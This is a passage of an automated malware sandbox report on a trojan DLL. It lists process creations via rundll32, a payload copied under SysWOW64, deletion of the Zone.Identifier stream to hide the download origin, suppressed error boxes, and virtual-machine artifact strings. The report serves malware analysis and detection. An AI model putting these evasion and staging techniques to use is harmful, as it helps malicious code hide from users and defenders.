                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B940E27_2_00B940E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BB1CDB7_2_00BB1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA52D17_2_00BA52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B990D47_2_00B990D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA28D57_2_00BA28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BB20CE7_2_00BB20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA10CD7_2_00BA10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B992C17_2_00B992C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B92CC27_2_00B92CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9243F7_2_00B9243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B934327_2_00B93432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B932287_2_00B93228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA282D7_2_00BA282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B998247_2_00B99824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BB261E7_2_00BB261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9800A7_2_00B9800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAC2057_2_00BAC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9FA787_2_00B9FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9387F7_2_00B9387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAB6777_2_00BAB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B968697_2_00B96869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B93A6C7_2_00B93A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9B4647_2_00B9B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9CE5A7_2_00B9CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B964537_2_00B96453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9544C7_2_00B9544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9AA4E7_2_00B9AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA30437_2_00BA3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9AE437_2_00B9AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA74457_2_00BA7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA85B87_2_00BA85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAD7BE7_2_00BAD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B959BF7_2_00B959BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B943BE7_2_00B943BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAE3B57_2_00BAE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA89A27_2_00BA89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAE5A77_2_00BAE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA0BA47_2_00BA0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BADDA57_2_00BADDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9B1917_2_00B9B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA15917_2_00BA1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B977957_2_00B97795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9358B7_2_00B9358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B94B817_2_00B94B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA37827_2_00BA3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B98D807_2_00B98D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BADB877_2_00BADB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B951EC7_2_00B951EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAEDED7_2_00BAEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9A3E77_2_00B9A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B975D27_2_00B975D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B919C07_2_00B919C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9F73B7_2_00B9F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BACD357_2_00BACD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9A92F7_2_00B9A92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA91247_2_00BA9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B94D1E7_2_00B94D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9CB137_2_00B9CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA970A7_2_00BA970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAE10A7_2_00BAE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA590E7_2_00BA590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA3D0C7_2_00BA3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BABF0C7_2_00BABF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BB03707_2_00BB0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9CF6E7_2_00B9CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9BD617_2_00B9BD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA65407_2_00BA6540
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6F24AC90 appears 33 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6F231DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F24AC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F231DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: 3pO1282Kpx.dllVirustotal: Detection: 23%
                      Source: 3pO1282Kpx.dllReversingLabs: Detection: 18%
                      Source: 3pO1282Kpx.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Tbiyedppjzsf\xswipktkmrv.drt",WgszfYRBINQe
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6544 -ip 6544
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 324
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6544 -ip 6544
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 332
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibuJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmjJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Tbiyedppjzsf\xswipktkmrv.drt",WgszfYRBINQeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6544 -ip 6544Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 324Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6544 -ip 6544Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 332Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A6E.tmpJump to behavior
                      Source: classification engineClassification label: mal68.troj.evad.winDLL@34/18@0/1
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6800:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6936:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6544
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 3pO1282Kpx.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 3pO1282Kpx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.650010447.0000000004329000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.666367575.0000000000A2C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.666826708.0000000000A2C000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: a4pjr7pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000013.00000002.659568546.00000000004A2000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.666367575.0000000000A2C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.666826708.0000000000A2C000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012113E7 push esi; retf 1_2_012113F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F256A93 push ecx; ret 1_2_6F256AA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F256A93 push ecx; ret 4_2_6F256AA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B913E7 push esi; retf 7_2_00B913F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F23E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,1_2_6F23E690
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Tbiyedppjzsf\xswipktkmrv.drtJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Tbiyedppjzsf\xswipktkmrv.drt:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6960Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F250AA5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_6F250AA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F250AA5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_6F250AA5
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: Amcache.hve.19.drBinary or memory string: VMware
                      Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.19.drBinary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
                      Source: Amcache.hve.19.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                      Source: WerFault.exe, 00000016.00000003.684751731.0000000004764000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                      Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.19.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: svchost.exe, 0000000A.00000002.744653763.0000020495E54000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.689833815.0000000004765000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.692036428.0000000004765000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.689756060.000000000479B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.692127501.00000000047A2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1x
                      Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.me
                      Source: svchost.exe, 0000000A.00000002.741934037.0000020490629000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW=
                      Source: svchost.exe, 0000000A.00000002.744676034.0000020495E61000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAWal\BFE_Notify_Event_{58328348-e77b-4df9-863b-dd539c6cd7d7}LMEM
